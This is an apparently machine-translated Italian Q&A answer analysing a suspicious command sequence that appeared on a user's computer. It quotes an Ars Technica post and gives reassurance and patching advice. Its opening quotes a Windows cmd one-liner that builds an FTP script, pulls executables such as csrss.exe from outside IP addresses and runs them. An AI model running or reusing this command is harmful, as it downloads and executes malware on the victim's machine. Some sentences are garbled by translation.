Beh, sembra che ci siano alcuni frammenti di codice simili sul web. Il più simile al tuo è stato trovato su un sito di tipo Pastebin che è stato rimosso (ma Google Cache era ancora attivo):
cmd /c echo open 201.120.57.137 21 >> ik &echo user oracle oracle >>
ik &echo binary >> ik &echo get update.exe >> ik &echo bye >> ik &ftp
-n -v -s:ik &del ik &update.exe &exit &echo open 95.125.139.200 11104 >> eq&echo user 1297 20204 >> eq &echo get csrss.exe >> eq &echo quit >> eq &ftp -n -s:eq &csrss.exe &del eq
Sebbene il codice sia un po 'diverso, c'è analisi abbastanza buona da parte del veterano membro del forum Ars Technica Syonyk qui:
tl;dr version: "Don't run VNC on a public IP with anything but a very,
very strong password. Better yet, don't run it on a public port (bind
it to localhost), and SSH/VPN in to access it."
A friend of mine has a Mac, and her system has been a bit strange
lately.
Specifically, it's been acting suspiciously like it's been rooted -
which, being a fellow Mac user, concerns me greatly. She's had random
text show up in IM windows, but apparently was away from the computer
and never investigated.
Tonight, she had something show up in a terminal window while she was
away, and IM'd it to me. I have remote (root) access to her system
(she's aware of this and set up the account for me), and was bored, so
I decided to investigate. ... My first thought was that this had to be
an automated program. A human won't try to enter Win32 specific
commands on a Mac. It appears that the program sent keycodes that were
not translated properly to the Mac, which would be consistent with an
automated program.
In genere penserei che:
-
Questo è un attacco automatico. csrss.exe è un sistema Windows
eseguibile e qualcuno che si rivolge specificamente al tuo sistema Linux
non proverei a invocarlo.
-
Questo tipo di attacco (passando una sequenza di comandi all'utente
appunti nella speranza che verrà eseguito inavvertitamente in a
prompt dei comandi) non è nuovo - il post di Ars Technica è del 2002, oltre
un decennio fa.
Quindi suggerisco che il tuo computer non possa essere compromesso (contrariamente all'opinione di Ars Technica sopra):
-
Sembra che tu non abbia commesso gli errori descritti. Potrebbe "solo" essere quello a
funzionalità del browser (o exploit) ha permesso l'accesso a un sito malevolo
i tuoi appunti.
-
Se effettivamente il tuo computer è stato compromesso, l'aggressore lo farebbe
non ho bisogno di usare questo metodo - egli interagirebbe solo con a
shell in remoto.
La soluzione per te sarebbe probabilmente un'attesa vigile, come in caso di allerta per ogni ulteriore stranezza e, se visto, rivalutare.
O se un'azione è stata ritenuta prudente, probabilmente i migliori sarebbero i soliti sospetti: assicurati che il tuo browser, i plug-in del browser e il tuo sistema operativo siano aggiornati con le patch di sicurezza.